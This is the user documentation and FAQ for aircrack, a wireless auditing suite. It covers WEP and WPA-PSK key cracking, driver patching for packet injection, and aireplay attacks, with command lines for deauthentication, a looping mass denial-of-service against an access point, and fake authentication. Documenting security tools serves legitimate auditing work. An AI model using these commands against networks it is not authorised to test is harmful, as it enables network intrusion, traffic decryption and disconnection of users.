-------------------------------------------------------------------------------

                            aircrack documentation                             

-------------------------------------------------------------------------------

What is aircrack ?

    aircrack is a set of tools for auditing wireless networks:
   
      + airodump: 802.11 packet capture program
      + aireplay: 802.11 packet injection program
      + aircrack: static WEP and WPA-PSK key cracker
      + airdecap: decrypts WEP/WPA capture files

Where to download aircrack ?

    The official download location is http://www.cr0.net:8040/code/network/.
    However, if you can't access port 8040 for some reason, you may use this
    mirror instead: http://100h.org/wlan/aircrack/.
   
    Also check this WEP cracking video, and this other WPA cracking video
    (flash required).

Is there an aircrack discussion forum ?

    There is no aircrack mailing-list, however you can post your bugreports and
    feature requests on the netstumbler Linux forum which I read quite
    regularly.

What is the song in that WEP cracking video ?

    The name of the song is Moskau, performed by Dschinghis Khan.

How do I crack a static WEP key ?

    The basic idea is to capture as much encrypted traffic as possible using
    airodump. Each WEP data packet has an associated 3-byte Initialization
    Vector (IV): after a sufficient number of data packets have been collected,
    run aircrack on the resulting capture file. aircrack will then perform a
    set of statistical attacks developped by a talented hacker named KoreK.

How many IVs are required to crack WEP ?

    WEP cracking is not an exact science. The number of required IVs depends on
    the WEP key length, and it also depends on your luck. Usually, 40-bit WEP
    can be cracked with 300.000 IVs, and 104-bit WEP can be cracked with
    1.000.000 IVs; if you're out of luck you may need two million IVs, or more.
   
    There's no way to know the WEP key length: this information is kept hidden
    and never announced, either in management or data packets; as a
    consequence, airodump can not report the WEP key length. Thus, it is
    recommended to run aircrack twice: when you have 250.000 IVs, start
    aircrack with "-n 64" to crack 40-bit WEP. Then if the key isn't found,
    restart aircrack (without the -n option) to crack 104-bit WEP.

I can't seem to capture any IVs !

    Possible reasons:
   
      + You are standing too far from the access point.
      + There is no traffic on the target wireless network.
      + There is some G traffic but you're capturing in B mode.
      + Something is wrong with your card (firmware problem ?)
   
    By the way, beacons are just unencrypted announcement packets. They're
    totally useless for WEP cracking.

Why is there no Windows version of aireplay ?

    The PEEK driver doesn't support 802.11 packet injection. In fact, there are
    no windows drivers supporting injection AT ALL. And I am NOT going to write
    one, so don't bother asking me.

It says "cygwin1.dll not found" when I start aircrack.exe

    You can download this library from: http://100h.org/wlan/aircrack/.
   
    To use aircrack, simply drag&drop your .cap or .ivs capture file(s) over
    aircrack.exe. If you want to pass options to the program you'll have to
    start a shell (cmd.exe) and manually type the command line; for example:
   
    C:\TEMP> aircrack.exe -n 64 -f 8 out1.cap out2.cap
   
    See below for a list of options.

Is my card compatible with airodump / aireplay ?

    First of all, search Google to find which chipset your card has. For
    example, if you have a Linksys WPC54G search for "wpc54g chipset linux".
   
       +-------------------------------------------------------------------+   
       |            |  Supported by  |   Supported by    |  Supported by   |   
       |  Chipset   |  airodump for  |   airodump for    |  aireplay for   |   
       |            |   Windows ?    |      Linux ?      |     Linux ?     |   
       |------------+----------------+-------------------+-----------------|   
       |            | YES (Agere     | YES (patched      | NO (firmware    |   
       | HermesI    | driver)        | orinoco driver)   | corrupts the    |   
       |            |                |                   | MAC header)     |   
       |------------+----------------+-------------------+-----------------|   
       |            |                | YES (HostAP or    | YES (either     |   
       |            | NO, but see    | wlan-ng driver),  | with HostAP or  |   
       | Prism2/3   | LinkFerret for | STA firmware      | wlan-ng, driver |   
       |            | an alternative | 1.5.6 or newer    | patching        |   
       |            |                | required          | required)       |   
       |------------+----------------+-------------------+-----------------|   
       |            | NO, but see    | YES (prism54      | YES (driver     |   
       | PrismGT    | LinkFerret for | driver, FullMAC   | patching        |   
       |            | an alternative | cards only!)      | recommended)    |   
       |            | (FullMAC only) |                   |                 |   
       |------------+----------------+-------------------+-----------------|   
       |            | YES (Atheros   | YES (madwifi      | YES (driver     |   
       | Atheros    | driver)        | driver)           | patching        |   
       |            |                |                   | required)       |   
       |------------+----------------+-------------------+-----------------|   
       |            |                |                   | YES (driver     |   
       |            | YES (Realtek   | YES (             | patching        |   
       | RTL8180    | driver)        | rtl8180-sa2400    | required), but  |   
       |            |                | driver)           | somewhat        |   
       |            |                |                   | unreliable      |   
       |------------+----------------+-------------------+-----------------|   
       |            | YES (Cisco     | YES (airo driver, |                 |   
       | Aironet    | driver)        | firmware 4.25.30  | NO              |   
       |            |                | recommended)      |                 |   
       |------------+----------------+-------------------+-----------------|   
       |            |                | YES (rt2400 /     | YES (rt2500     |   
       | Ralink     | NO             | rt2500 / rt2570   | only, driver    |   
       |            |                | driver)           | patching        |   
       |            |                |                   | required)       |   
       |------------+----------------+-------------------+-----------------|   
       |            |                | PARTIAL: the      |                 |   
       | Centrino b | NO             | ipw2100 driver    | NO              |   
       |            |                | doesn't discard   |                 |   
       |            |                | corrupted packets |                 |   
       |------------+----------------+-------------------+-----------------|   
       | Centrino b | NO             | YES (ipw2200      | NO (firmware    |   
       | /g         |                | driver)           | drops packets)  |   
       |------------+----------------+-------------------+-----------------|   
       | TI (ACX100 | NO             | UNKNOWN (acx100   | NO              |   
       | / ACX111)  |                | driver)           |                 |   
       |------------+----------------+-------------------+-----------------|   
       |            |                | NO (and btw,      |                 |   
       | Broadcom   | NO             | airodump is NOT   | NO              |   
       |            |                | compatible with   |                 |   
       |            |                | ndiswrapper)      |                 |   
       +-------------------------------------------------------------------+   
   
    Some cards are not recognized by the Windows drivers above, even though
    they have the correct chipset. In this case, open the hardware manager,
    select your card, "Update the driver", select "Install from a specific
    location", select "Don't search, I will choose the driver to install",
    click "Have disk", set the path to where the driver has been unzipped,
    uncheck "Show compatible hardware", and finally choose the driver.

I have a Prism2 card, but airodump / aireplay doesn't seem to work !

    This is very likely a firmware problem. Old firmwares have trouble with
    test mode 0x0A (used by the HostAP / wlan-ng injection patches), so make
    sure yours is up to date -- see below for instructions. The recommended
    station firmware version is 1.7.4. If it doesn't work well (kismet or
    airodump stalls after capturing a couple of packets), try STA 1.5.6
    instead.
   
    Also, test mode 0x0A is somewhat unstable with wlan-ng. If the card seems
    stuck, you will have to reset it.

I have an Atheros card, and the madwifi patch crashes the kernel /
aireplay keeps saying enhanced RTC support isn't available.

    There are quite a few problems with some versions of the Linux 2.6 branch
    (especially before 2.6.11 was released) that will cause a kernel panic when
    injecting with madwifi. Also, on many 2.6 kernels enhanced RTC support is
    simply broken. Thus, is it highly recommended to use either Linux 2.6.11.x
    or preferably Linux >= 2.4.31.

How do I update my Prism2 firmware ?

    Make sure you are using patched HostAP (see below for instructions on how
    to patch and install HostAP). Alternatively, you may boot the WHAX Live CD!
    (which already has patched HostAP) and run the switch-to-hostap script.
   
    Now that HostAP is loaded, you can check your firmware's primary and
    station version with this command:
   
    # dmesg | grep wifi
    hostap_cs: Registered netdevice wifi0
    wifi0: NIC: id=0x800c v1.0.0
    wifi0: PRI: id=0x15 v1.1.1  (primary firmware is 1.1.1)
    wifi0: STA: id=0x1f v1.7.4  (station firmware is 1.7.4)
    wifi0: registered netdevice wlan0
   
    If the NIC id above is between 0x8002 and 0x8008, you have an old Prism2
    and MUST use STA firmware version 1.5.6. Otherwise, you should use PRI
    1.1.1 / STA 1.7.4 which is the most stable firmware version for newer
    Prism2 cards. Do NOT use firmware 1.7.1 or 1.8.x, people have reported
    having trouble with them.
   
    To update the firmware, you'll need prism2_srec from the hostap-utils
    package; if it's not present on your system, download and compile
    hostap-utils:
   
    wget http://100h.org/wlan/linux/prism2/hostap-utils-0.3.7.tar.gz
    tar -xvzf hostap-utils-0.3.7.tar.gz
    cd hostap-utils-0.3.7
    make
   
    Some Prism2 cards have been restricted to a certain set of channels because
    of country regulation. You can activate all 14 channels with the following
    commands:
   
    ./prism2_srec wlan0 -D > pda; cp pda pda.bak
    Edit pda and put 3FFF at offset 0104 (line 24)
   
    Finally, download the firmware and flash your card. If the NIC id is
    between 0x8002 and 0x8008:
   
    wget http://100h.org/wlan/linux/prism2/sf010506.hex
    ./prism2_srec -v -f wlan0 sf010506.hex -P pda
   
    Otherwise:
   
    wget http://100h.org/wlan/linux/prism2/pk010101.hex
    wget http://100h.org/wlan/linux/prism2/sf010704.hex
    ./prism2_srec -v -f wlan0 pk010101.hex sf010704.hex -P pda
   
    If you get the message "ioctl[PRISM2_IOCTL_HOSTAPD]: Operation not
    supported", the HostAP driver is not loaded and you must install it. If you
    get the message "ioctl[PRISM2_IOCTL_DOWNLOAD]: Operation not supported",
    then your HostAP driver has not been properly patched for non-volatile
    download support.
   
    Another alternative is to upgrade the firmware with WinUpdate - this
    requires to have the WPC11 driver v2.5 installed. See http://100h.org/wlan/
    linux/prism2/.

Which is the best card to buy ?

    My favourite card is the Netgear WAG511, which is Atheros-based and has
    excellent sensitivity (no external antenna connector though); a cheaper
    version is the WG511T (PCMCIA) / WG311T (PCI). Another nice Atheros card is
    the Proxim 8470-WD, this one has an external MC antenna connector. Also,
    the DWL-G650/G650M is quite cheap (either rev. B or C, but do not buy the
    DWL-650+ which has a TI chipset); the PCI equivalent is the DWL-G520
    (likewise, don't buy the G520+).
   
    Ralink makes some nice b/g chipsets, and has been very cooperative with the
    open-source community to release GPL drivers. Injection is now fully
    supported on PCI/PCMCIA RT2500 cards (such as the MSI CB54G2), and should
    hopefully be supported in the future with USB RT2570 adapters.
   
    Do NOT buy anything that might have a PrismGT chipset. Some time ago,
    Connexant decided to stop manufacturing their FullMAC chipset and released
    a cheap, crippled-down version known as "SoftMAC", which is totally
    incompatible with the prism54 driver.
   
    Connexant has not been cooperative at all with the prism54 project, so they
    don't deserve any of your money. As a matter of fact, FullMAC cards are not
    being sold anymore -- you'll only find crappy SoftMAC in retail. In
    particular, do not buy the WG511 (v2 / v3), the 3CRWE154G72 (v2 / v3), the
    SMC2835W (v3), the SMC2802W (v2) or the ZyAIR G-300 (v2 / v3).

How do I use airodump for Windows ?

    First of all, make sure that your card is compatible (see table above) and
    that you have installed the proper driver from WildPackets. Also, you must
    download peek.dll and peek5.sys and put them in the same directory as
    airodump.exe.
   
    When running airodump, you should specify:
   
      + The network interface index number, which must be picked in the list
        displayed by airodump.
      + The network interface type ('o' for HermesI and Realtek, 'a' for
        Aironet and Atheros).
      + The channel number, between 1 and 14. You can also specify 0 to hop
        between all channels.
      + The output prefix. For example, if the prefix is "foo", then airodump
        will create foo.cap (captured packets) and foo.txt (CSV statistics). If
        foo.cap already exists, airodump will resume the capture session by
        appending the packets to it.
      + The "only IVs" flag. Specify 1 if you just want to save the IVs from
        WEP data packets. This saves space, but the resulting file (foo.ivs)
        will only be useful for WEP cracking.
   
    To stop capturing packets, simply press Ctrl-C. You may get a blue screen,
    this is due to a bug in the PEEK driver not properly exiting monitor mode.
    Also, the capture file may be empty. The cause of this bug is unknown.

Why can't I compile airodump and aireplay on BSD / Mac OS X ?

    Both airodump and aireplay sources are linux-specific. There are no plans
    to port them on any other operating system.

How do I use airodump for Linux ?

    Before running airodump, you may start the airmon.sh script to list the
    detected wireless interfaces.
   
      usage: airodump <interface name or pcap filename>
                      <output prefix> <channel> [IVs flag]
   
    The first argument can be an interface name (such as: eth1, ath0, wlan0,
    etc.) in which case airodump will capture packets on this interface. You
    may also specify a pcap filename instead, for example to analyze a previous
    capture.
   
    If you specify the same output prefix, airodump will resume the session and
    append the packets at the end of the existing capture file.
   
    You can hop between channels by specifying 0 as the channel number;
    however, when attacking a WLAN you should rather specify the channel number
    of the target access point. Also, the channel number will be ignored if the
    packet source is a capture file.
   
    You may set the optional IVs flag to only write the captured WEP IVs; this
    will save a lot of space, but the resulting file won't be useful for
    anything else than WEP cracking. If the flag is not set, the whole packets
    are saved.
   
    Also, during the capture airodump updates a plain .txt file with all the
    detected access points and stations.
   
    Some examples:
   
    Channel hopping with HostAP  : airodump wlan0 out 0      
    Capture packets on channel 4 : airodump ath0 test 4      
    Only save IVs on channel 10  : airodump ath0 test 10 1   
    Extract IVs from a pcap file : airodump out.cap small 0 1
   
airodump keeps switching between WEP and WPA.

    This is happening because your driver doesn't properly discard corrupted
    packets (that have an invalid CRC). If it's a Centrino b, it just can't be
    helped; go buy a better card. If it's a Prism2, try upgrading the firmware.

Sometimes airodump hangs for no apparent reason.

    Yep, I'm not sure exactly where this bug comes from; it rarely occurs,
    fortunately.

What's the meaning of the fields displayed by airodump ?

    airodump will display a list of detected access points, and also a list of
    connected clients ("stations"). Here's an example screenshot using a Prism2
    card with HostAP:
   
    +-------------------------------------------------------------------------+
    |  BSSID              PWR  Beacons      IP / # Data  CH  MB  ENC  ESSID   |
    |                                                                         |
    |  00:13:10:30:24:9C  223     1045              203   6  48  WEP  myap    |
    |                                                                         |
    |  BSSID              STATION            PWR   Packets  ESSID             |
    |                                                                         |
    |  00:13:10:30:24:9C  00:09:5B:EB:C5:2B  203       154  myap              |
    |  00:13:10:30:24:9C  00:02:2D:C1:5D:1F  190        17  myap              |
    +-------------------------------------------------------------------------+
   
       +-------------------------------------------------------------------+   
       |  Field  |                       Description                       |   
       |---------+---------------------------------------------------------|   
       | BSSID   | MAC address of the access point.                        |   
       |---------+---------------------------------------------------------|   
       |         | Signal level reported by the card. Its signification    |   
       | PWR     | depends on the driver, but as the signal gets higher    |   
       |         | you get closer to the AP or the station. If PWR == -1,  |   
       |         | the driver doesn't support signal level reporting.      |   
       |---------+---------------------------------------------------------|   
       |         | Number of announcements packets sent by the AP. Each    |   
       | Beacons | access point sends about ten beacons per second at the  |   
       |         | lowest rate (1M), so they can usually be picked up from |   
       |         | very far.                                               |   
       |---------+---------------------------------------------------------|   
       | IP / #  | LAN IP address if unencrypted, otherwise the number of  |   
       |  Data   | captured WEP or WPA encrypted data packets (including   |   
       |         | data broadcast packets).                                |   
       |---------+---------------------------------------------------------|   
       |         | Channel number (taken from beacon packets). Note:       |   
       | CH      | sometimes packets from other channels are captured even |   
       |         | if airodump is not hopping, because of radio            |   
       |         | interference.                                           |   
       |---------+---------------------------------------------------------|   
       |         | Maximum speed supported by the AP. If MB = 11, it's     |   
       | MB      | 802.11b, if MB = 22 it's 802.11b+ and higher rates are  |   
       |         | 802.11g.                                                |   
       |---------+---------------------------------------------------------|   
       |         | Encryption algorithm in use. OPN = no encryption, "WEP? |   
       |         | " = WEP or higher (not enough data to choose between    |   
       | ENC     | WEP and WPA), WEP (without the question mark) indicates |   
       |         | static or dynamic WEP, and WPA if TKIP or CCMP is       |   
       |         | present.                                                |   
       |---------+---------------------------------------------------------|   
       |         | The so-called "SSID", which can be empty if SSID hiding |   
       | ESSID   | is activated. In this case, airodump will try to        |   
       |         | recover the SSID from probe responses and association   |   
       |         | requests.                                               |   
       |---------+---------------------------------------------------------|   
       |         | MAC address of each associated station. In the          |   
       | STATION | screenshot above, two clients have been detected (00:   |   
       |         | 09:5B:EB:C5:2B and 00:02:2D:C1:5D:1F).                  |   
       +-------------------------------------------------------------------+   

How do I merge multiple capture files ?

    You may use the mergecap program (part of the ethereal-common package or
    the win32 distribution):
   
    mergecap -w out.cap test1.cap test2.cap test3.cap
   
    As of now, it's not possible to merge .ivs files.

Can I use Ethereal to capture 802.11 packets ?

    Under Linux, simply setup the card in monitor mode with the airmon.sh
    script. Under Windows, Ethereal can NOT capture 802.11 packets.

How do I change my card's MAC address ?

    This operation is only possible under Linux. For example, if you have an
    Atheros card:
   
    ifconfig ath0 down hw ether 00:10:20:30:40:50
    ifconfig ath0 up

How do I use aircrack ?

    Usage: aircrack [options] <capture file(s)>
   
    You can specify multiple input files (either in .cap or .ivs format). Also,
    you can run both airodump and aircrack at the same time: aircrack will
    auto-update when new IVs are available.
   
    Here's a summary of all available options:
   
       +-------------------------------------------------------------------+   
       | Option | Param. |                   Description                   |   
       |--------+--------+-------------------------------------------------|   
       | -a     | amode  | Force attack mode (1 = static WEP, 2 =          |   
       |        |        | WPA-PSK).                                       |   
       |--------+--------+-------------------------------------------------|   
       |        |        | If set, all IVs from networks with the same     |   
       | -e     | essid  | ESSID will be used. This option is also         |   
       |        |        | required for WPA-PSK cracking if the ESSID is   |   
       |        |        | not broadcasted (hidden).                       |   
       |--------+--------+-------------------------------------------------|   
       | -b     | bssid  | Select the target network based on the access   |   
       |        |        | point's MAC address.                            |   
       |--------+--------+-------------------------------------------------|   
       | -p     | nbcpu  | On SMP systems, set this option to the number   |   
       |        |        | of CPUs.                                        |   
       |--------+--------+-------------------------------------------------|   
       | -q     | none   | Enable quiet mode (no status output until the   |   
       |        |        | key is found, or not).                          |   
       |--------+--------+-------------------------------------------------|   
       | -c     | none   | (WEP cracking) Restrict the search space to     |   
       |        |        | alpha-numeric characters only (0x20 - 0x7F).    |   
       |--------+--------+-------------------------------------------------|   
       | -d     | start  | (WEP cracking) Set the beginning the WEP key    |   
       |        |        | (in hex), for debugging purposes.               |   
       |--------+--------+-------------------------------------------------|   
       |        |        | (WEP cracking) MAC address to filter WEP data   |   
       | -m     | maddr  | packets. Alternatively, specify -m ff:ff:ff:ff: |   
       |        |        | ff:ff to use all and every IVs, regardless of   |   
       |        |        | the network.                                    |   
       |--------+--------+-------------------------------------------------|   
       |        |        | (WEP cracking) Specify the length of the key:   |   
       | -n     | nbits  | 64 for 40-bit WEP, 128 for 104-bit WEP, etc.    |   
       |        |        | The default value is 128.                       |   
       |--------+--------+-------------------------------------------------|   
       |        |        | (WEP cracking) Only keep the IVs that have this |   
       | -i     | index  | key index (1 to 4). The default behaviour is to |   
       |        |        | ignore the key index.                           |   
       |--------+--------+-------------------------------------------------|   
       |        |        | (WEP cracking) By default, this parameter is    |   
       |        |        | set to 3 for 104-bit WEP and to 6 for 40-bit    |   
       | -f     | fudge  | WEP. Specify a higher value to increase the     |   
       |        |        | bruteforce level: cracking will take more time, |   
       |        |        | but with a higher likelyhood of success.        |   
       |--------+--------+-------------------------------------------------|   
       |        |        | (WEP cracking) There are 17 korek statistical   |   
       |        |        | attacks. Sometimes one attack creates a huge    |   
       | -k     | korek  | false positive that prevents the key from being |   
       |        |        | found, even with lots of IVs. Try -k 1, -k 2,   |   
       |        |        | ... -k 17 to disable each attack selectively.   |   
       |--------+--------+-------------------------------------------------|   
       | -x     | none   | (WEP cracking) Do not bruteforce the last two   |   
       |        |        | keybytes.                                       |   
       |--------+--------+-------------------------------------------------|   
       |        |        | (WEP cracking) This is an experimental single   |   
       | -y     | none   | bruteforce attack which should only be used     |   
       |        |        | when the standard attack mode fails with more   |   
       |        |        | than one million IVs.                           |   
       |--------+--------+-------------------------------------------------|   
       | -w     | words  | (WPA cracking) Path to a wordlist.              |   
       +-------------------------------------------------------------------+   

Could you implement a resume option in aircrack ?

    There are no plans to implement this feature.

How can I crack a WPA-PSK network ?

    You must sniff until a handshake takes place between a wireless client and
    the access point. To force the client to reauthenticate, you can start a
    deauth attack with aireplay. Also, a good dictionary is required; see
    http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/
   
    FYI, it's not possible to pre-compute large tables of Pairwise Master Keys
    like rainbowcrack does, since the passphrase is salted with the ESSID.

Will WPA be cracked in the future ?

    It's extremely unlikely that WPA will be cracked just like WEP was. Even
    TKIP provides a high security level, and CCMP is even better. The 4-way
    handshake and encryption protocols are very robust and secure, provided
    that the passphrase was chosen wisely (that is, not in a dictionary ;-).

I have more than one million IVs, but aircrack doesn't find the key !

    Possible reasons:
   
      + Out of luck: you must capture more IVs. Usually, 104-bit WEP can be
        cracked with about one million IVs, but sometimes more IVs are needed.
         
      + If all votes seem equal, or if there are many negative votes, then the
        capture file is corrupted, or the key is not static.
         
      + A false positive prevented the key from being found. Try to disable
        each korek attack (-k 1 .. 17), raise the fudge factor (-f) or try the
        experimental single reverse attack (-y).

I've found the key, how do I decrypt a capture file ?

    Simply use the airdecap program:
   
      usage: airdecap [options] <pcap file>
    
          -l       : don't remove the 802.11 header
          -b bssid : access point MAC address filter
          -k pmk   : WPA Pairwise Master Key in hex
          -e essid : target network ascii identifier
          -p pass  : target network WPA passphrase
          -w key   : target network WEP key in hex
    
      examples:
    
      airdecap -b 00:09:5B:10:BC:5A open-network.cap
      airdecap -w 11A3E229084349BC25D97E2939 wep.cap
      airdecap -e my_essid -p my_passphrase tkip.cap

How do I recover my WEP key in Windows ?

    You may use the WZCOOK program which recovers WEP keys from XP's Wireless
    Zero Configuration utility. This is experimental software, so it may or may
    not work depending on your service pack level.

Does WZCOOK also recovers WPA keys ?

    WZCOOK will display the PMK (Pairwise Master Key), a 256-bit value which is
    the result of the passphrase hashed 8192 times together with the ESSID and
    the ESSID length. The passphrase itself can't be recovered -- however,
    knowing the PMK is enough to connect to a WPA-protected wireless network
    with wpa_supplicant (see the Windows README). Your wpa_supplicant.conf
    configuration file should look like:
   
    network={
        ssid="my_essid"
        pmk=5c9597f3c8245907ea71a89d[...]9d39d08e
    }

How do I patch the driver for injection with aireplay ?

    As of now, aireplay only supports injection on Prism2, PrismGT (FullMAC),
    Atheros, RTL8180 and Ralink 2500. Injection on other chipsets (including,
    but not limited to, HermesI, Aironet and Centrino) is not supported because
    of firmware and/or driver limitations.
   
    Injection on Prism2 and Atheros is still pretty much experimental; if your
    card appears to hang (no packets captured or injected), disable the
    interface, reload the drivers and re-insert the card. Also consider
    updating the firmware (if Prism2).
   
    All drivers must be patched so as to support injection in Monitor mode. You
    will need linux headers that match your current running kernel; if not, you
    will have to download the linux source and compile a custom kernel.
   
    If you have trouble patching and compiling stuff, you may want to use the 
    WHAX or Auditor LiveCD; both already include patched device drivers.
   
      + Installing the madwifi driver (Atheros cards)
       
        Note 1: you'll need uudecode from the sharutils package.
       
        Note 2: the madwifi patch crashes some versions of the 2.6 kernel. If
        this happens, use Linux 2.4.x or 2.6.11.x instead of your current
        kernel.
       
        Note 3: do not use a newer version of the madwifi CVS. The last known
        stable version is 2005-07-07.
       
        ifconfig ath0 down
        rmmod ath_pci 2>/dev/null
        rmmod wlan 2>/dev/null
        
        cd /usr/src
        wget http://100h.org/wlan/linux/atheros/madwifi-cvs-20050707.tgz
        wget http://100h.org/wlan/linux/patches/madwifi-cvs-20050707.patch
        tar -xvzf madwifi-cvs-20050707.tgz
        cd madwifi-cvs-20050707
        patch -Np1 -i ../madwifi-cvs-20050707.patch
        make && make install
        modprobe ath_pci
       
        Since aircrack-2.2-beta12, the madwifi patch add support for injection
        in Auto (b/g) mode. Do not use the "iwpriv ath0 mode 2" command
        anymore, instead run:
       
        iwpriv ath0 mode 0
       
                         +-----------------------------------+                 
                         | Allowed modes |  Physical medium  |                 
                         |---------------+-------------------|                 
                         | Mode 0        | Automatic (a/b/g) |                 
                         |---------------+-------------------|                 
                         | Mode 1        | 802.11a only      |                 
                         |---------------+-------------------|                 
                         | Mode 2        | 802.11b only      |                 
                         |---------------+-------------------|                 
                         | Mode 3        | 802.11g only      |                 
                         +-----------------------------------+                 
       
        Also, it is now possible to set the transmit rate with madwifi. The
        default rate is set to 5.5 Mbps, but you can lower it or raise it,
        depending on your distance from the AP. For example:
       
        iwconfig ath0 rate 24M
       
        When using attacks 2, 3 and 4, changing the number of packets per
        second sent by aireplay (option -x) sometimes helps getting better
        results; the default is 500 pps.
       
                   +----------------------------------------------+            
                   | Modulation |          Allowed rates          |            
                   |------------+---------------------------------|            
                   | DSSS (11b) | 1M, 2M, 5.5M, 11M               |            
                   |------------+---------------------------------|            
                   | OFDM (11g) | 6M, 9M, 12M, 24M, 36M, 48M, 54M |            
                   +----------------------------------------------+            
       
      + Installing the prism54 driver (PrismGT FullMAC cards)
       
        ifconfig eth1 down
        rmmod prism54 2>/dev/null
        
        cd /usr/src
        wget http://100h.org/wlan/linux/prismgt/prism54-svn-20050724.tgz
        wget http://100h.org/wlan/linux/patches/prism54-svn-20050724.patch
        tar -xvzf prism54-svn-20050724.tgz
        cd prism54-svn-20050724
        patch -Np1 -i ../prism54-svn-20050724.patch
        make modules && make install
        wget http://100h.org/wlan/linux/prismgt/1.0.4.3.arm
        mkdir -p /usr/lib/hotplug/firmware
        mkdir -p /lib/firmware
        cp 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890
        mv 1.0.4.3.arm /lib/firmware/isl3890
        depmod -a
       
      + Installing the HostAP driver (Prism2 cards)
       
        ifconfig wlan0 down
        wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable 2>/dev/null
        /etc/init.d/pcmcia stop
        rmmod prism2_pci 2>/dev/null
        rmmod hostap_pci 2>/dev/null
        
        cd /usr/src
        wget http://100h.org/wlan/linux/prism2/hostap-driver-0.3.9.tar.gz
        wget http://100h.org/wlan/linux/patches/hostap-driver-0.3.9.patch
        tar -xvzf hostap-driver-0.3.9.tar.gz
        cd hostap-driver-0.3.9
        patch -Np1 -i ../hostap-driver-0.3.9.patch
        make && make install
        mv -f /etc/pcmcia/wlan-ng.conf /etc/pcmcia/wlan-ng.conf~
        /etc/init.d/pcmcia start
        modprobe hostap_pci &>/dev/null
       
      + Installing the wlan-ng driver (Prism2 cards)
       
        Important note: when the card is inserted, wlan-ng will flash the
        firmware in RAM (volatile download) with versions PRI 1.1.4 and STA
        1.8.3. Many users experienced problems with this operation, so in any
        case it's safer to just use hostap instead. Furthermore, HostAP works
        more reliably and supports iwconfig whereas wlan-ng doesn't.
       
        ifconfig wlan0 down
        wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable 2>/dev/null
        /etc/init.d/pcmcia stop
        rmmod prism2_pci 2>/dev/null
        rmmod hostap_pci 2>/dev/null
        find /lib/modules \( -name p80211* -o -name prism2* \) \
            -exec rm -v {} \;
        
        cd /usr/src
        wget http://100h.org/wlan/linux/prism2/wlanng-0.2.1-pre26.tar.gz
        wget http://100h.org/wlan/linux/patches/wlanng-0.2.1-pre26.patch
        tar -xvzf wlanng-0.2.1-pre26.tar.gz
        cd wlanng-0.2.1-pre26
        patch -Np1 -i ../wlanng-0.2.1-pre26.patch
        make config && make all && make install
        mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~ 2>/dev/null
        /etc/init.d/pcmcia start
        modprobe prism2_pci &>/dev/null
       
      + Installing the r8180-sa2400 driver (RTL8180 cards)
       
        ifconfig wlan0 down
        rmmod r8180 2>/dev/null
        
        cd /usr/src
        wget http://100h.org/wlan/linux/rtl8180/rtl8180-0.21.tar.gz
        wget http://100h.org/wlan/linux/patches/rtl8180-0.21.patch
        tar -xvzf rtl8180-0.21.tar.gz
        cd rtl8180-0.21
        patch -Np1 -i ../rtl8180-0.21.patch
        make && make install
        modprobe r8180
       
      + Installing the rt2500 driver (Ralink b/g cards)
       
        ifconfig ra0 down
        rmmod rt2500 2>/dev/null
        
        cd /usr/src
        wget http://100h.org/wlan/linux/ralink/rt2500-cvs-20050724.tgz
        wget http://100h.org/wlan/linux/patches/rt2500-cvs-20050724.patch
        tar -xvzf rt2500-cvs-20050724.tgz
        cd rt2500-cvs-20050724
        patch -Np1 -i ../rt2500-cvs-20050724.patch
        cd Module
        make && make install
        modprobe rt2500

The driver won't compile.

    This usually happens because the linux headers don't match your current
    running kernel. In this situation, just recompile a fresh kernel, install
    it and reboot. Then, try again compiling the driver.
   
    See this HOWTO for more details about kernel recompilation.

How do I use aireplay ?

    If the driver was properly patched, aireplay is able to inject raw 802.11
    packets in Monitor mode; it currently implements a set of five different
    attacks.
   
    With some versions of the Linux kernel, injection will trigger some
    "protocol 0300 is buggy, dev ath0" or "protocol 1900 is buggy, dev wlan0"
    debug messages, which are totally harmless and can be ignored safely. Run
    "dmesg -n 1" to prevent these messages from flooding the console.
   
    If you get "ioctl(SIOCGIFINDEX) failed: No such device", double check that
    your device name is correct and that you haven't forgotten a parameter on
    the command line.
   
    In the following examples, 00:13:10:30:24:9C is the MAC address of the
    access point (on channel 6), and 00:09:5B:EB:C5:2B is the MAC address of a
    wireless client.
   
      + Attack 0: deauthentication
       
        This attack is mostly useful to recover a hidden (not broadcasted)
        ESSID and for capturing WPA handshakes by forcing clients to
        reauthenticate. It can also be used to generate ARP requests as Windows
        clients sometimes flush their ARP cache when disconnected. Of course,
        this attack is totally useless if there are no wireless clients.
       
        Some examples:
       
          o WPA Handshake capture with an Atheros
           
            airmon.sh start ath0
            airodump ath0 out 6  (switch to another console)
            aireplay -0 5 -a 00:13:10:30:24:9C ath0; sleep 5
            aircrack -w /path/to/dictionary out.cap
           
          o ARP request generation with a Prism2 card
           
            airmon.sh start wlan0
            airodump wlan0 out 6  (switch to another console)
            aireplay -0 5 -a 00:13:10:30:24:9C wlan0
            aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
           
            After sending the five batches of deauthentication packets, we
            start listening for ARP requests with attack "3". The -h option is
            mandatory and has to be the MAC address of an associated client.
           
            If the driver is wlan-ng, it is mandatory to run the airmon.sh
            script -- otherwise the card won't be setup properly for injection.
           
          o Mass denial-of-service with a RT2500 card
           
            airmon.sh start ra0
            aireplay -0 0 -a 00:13:10:30:24:9C ra0
           
            With parameter 0, this attack will loop forever sending
            deauthentication packets to the broadcast address, thus preventing
            clients from staying connected.
       
      + Attack 1: fake authentication
       
        This attack is particularly useful when there are no associated
        clients: we create a fake client MAC address which will be registered
        in the AP's association table. This address will then be used for
        attacks 3 (ARP request reinjection) and 4 ("chopchop" WEP decryption).
       
        However if this attack fails and there is already an associated client,
        it's more reliable to just use his MAC address (here, 00:09:5B:EB:C5:
        2B) in attacks 3 and 4.
       
        aireplay -1 0 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
        12:14:06  Sending Authentication Request
        12:14:06  Authentication successful
        12:14:06  Sending Association Request
        12:14:07  Association successful :-)
       
        Some access points require to reassociate every 30 seconds, otherwise
        our fake client is considered disconnected. In this case, setup the
        periodic re-association delay:
       
        aireplay -1 30 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
       
        If this attacks seems to fail (aireplay keeps sending authentication
        requests), make sure that:
       
          o You are close enough to the access point.
          o The driver is properly patched and installed.
          o The card is configured on the same channel as the AP.
          o The BSSID and ESSID (-a / -e options ) are correct.
          o If Prism2, make sure the firmware was updated.
